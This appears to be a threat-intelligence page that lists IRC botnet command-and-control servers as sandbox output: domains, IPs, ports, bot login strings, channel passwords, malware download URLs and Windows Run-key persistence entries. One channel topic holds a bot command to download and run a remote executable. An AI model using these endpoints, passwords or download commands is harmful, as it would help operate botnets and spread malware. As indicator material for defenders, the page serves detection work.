asp.thand.su

DNS Lookup Host Name IP Address 0 127.0.0.1 193.104.27.98 193.104.27.98 UDP Connections Remote IP Address: 127.0.0.1 Port: 1046 Send Datagram: 78 packet(s) of size 1 Recv Datagram: 78 packet(s) of size 1 Download URLs http://193.104.27.98/2krn.bin (193.104.27.98) Outgoing connection to remote server: 193.104.27.98 TCP port 80 DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.11.2 10.1.11.1 10.1.11.1

igotyour.info

Remote Host Port Number 174.129.200.54 80 91.211.119.179 2882 * The data identified by the following URL was then requested from the remote web server: o http://api.hostip.info/get_html.php PING :igotyour.info USER MartyBot 1 * :MartyBot NICK {WinXP|US|COMPUTERNAME|7322} MODE {WinXP|US|COMPUTERNAME|7322}-ix JOIN #pirates# PONG #pirates# Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Generic

217.148.32.202

Remote Host Port Number 217.148.32.202 27034 MODE #!!hh!!# +ix NICK [00|USA|814587] USER XP-7283 * 0 :COMPUTERNAME MODE [00|USA|814587] +ix JOIN #!!hh!!# sextsex PASS sextsex * The following port was open in the system: Port Protocol Process 1054 TCP wwwwwww.exe.exe (%Windir%wwwwwww.exe.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Java Update =

bot.sohbetodasi.info

bot.sohbetodasi.info 95.168.167.63 * C&C Server: 95.168.167.63:3454 * Server Password: * Username: XP-9973 * Nickname: [DEU|00|P|60586] * Channel: ##msn## (Password: kuzen) * Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “test” = meskoo.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “test” = meskoo.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:yeni.exe” = c:yeni.exe:*:Enabled:test HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout] HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active”

fr.ukbues.su

Host Name IP Address 0 127.0.0.1 193.104.27.98 193.104.27.98 UDP Connections Remote IP Address: 127.0.0.1 Port: 1043 Send Datagram: 2 packet(s) of size 1 Recv Datagram: 2 packet(s) of size 1 Download URLs http://193.104.27.98/2krn.bin (193.104.27.98) Outgoing connection to remote server: 193.104.27.98 TCP port 80 DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.11.2 10.1.11.1 10.1.11.1 wpad 193.104.27.98

xx.enterhere.biz/xx.nadnadzz.info/xx.ka3ek.com(large botnet)

xx.enterhere.biz xx.nadnadzz.info xx.ka3ek.com for port have a look on the blog Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwarebcrypt “i” = [REG_DWORD, value: 000007D9] HKEY_CURRENT_USERSoftwarebcrypt “i” = [REG_DWORD, value: 000007D9] HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Logon Application” = C:WINDOWSsystem32winIogon.exe Reads HKEY_CURRENT_USERSoftwarebcrypt “i” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptography “MachineGuid” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”

88.255.120.175

Remote Host Port Number 88.255.120.175 7075 MODE [USA|XP|324449] -ix JOIN #heur heur NICK [USA|XP|324449] USER rcccgtw * 0 :COMPUTERNAME PASS heur * The following port was open in the system: Port Protocol Process 1053 TCP csrs.exe (%Windir%csrs.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “csrs.exe” so that

217.23.8.169

Remote Host Port Number 217.23.8.169 6667 USER {New}{UserName|v3}866 {New}{UserName|v3}866 * :{New}{UserName|v3}866 NICK {New}{UserName|v3}866 PRIVMSG #b0tz : 5 > * The following port was open in the system: Port Protocol Process 1054 TCP [file and pathname of the sample #1] Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “%UserProfile%svchost.exe”

216.66.78.116

Remote Host Port Number 206.188.193.39 80 216.66.78.116 6567 MODE [SH|USA|00|P|33762] -ix JOIN #salvando# c1rc0s0leil PRIVMSG #salvando# :[Dl]: File download: 117.7KB to: c:windowswichin.exe @ 117.7KB/sec. PRIVMSG #salvando# :[Dl]: Created process: “c:windowswichin.exe”, PID: PONG Google.Rules.Com NICK [SH|USA|00|P|33762] USER XP-9702 * 0 :COMPUTERNAME Now talking in #salvando# Topic On: [ #salvando# ] [ .desfi http://www.johngarzon.com.co/menu/xd/wichin.exe c:windowswichin.exe 1 ]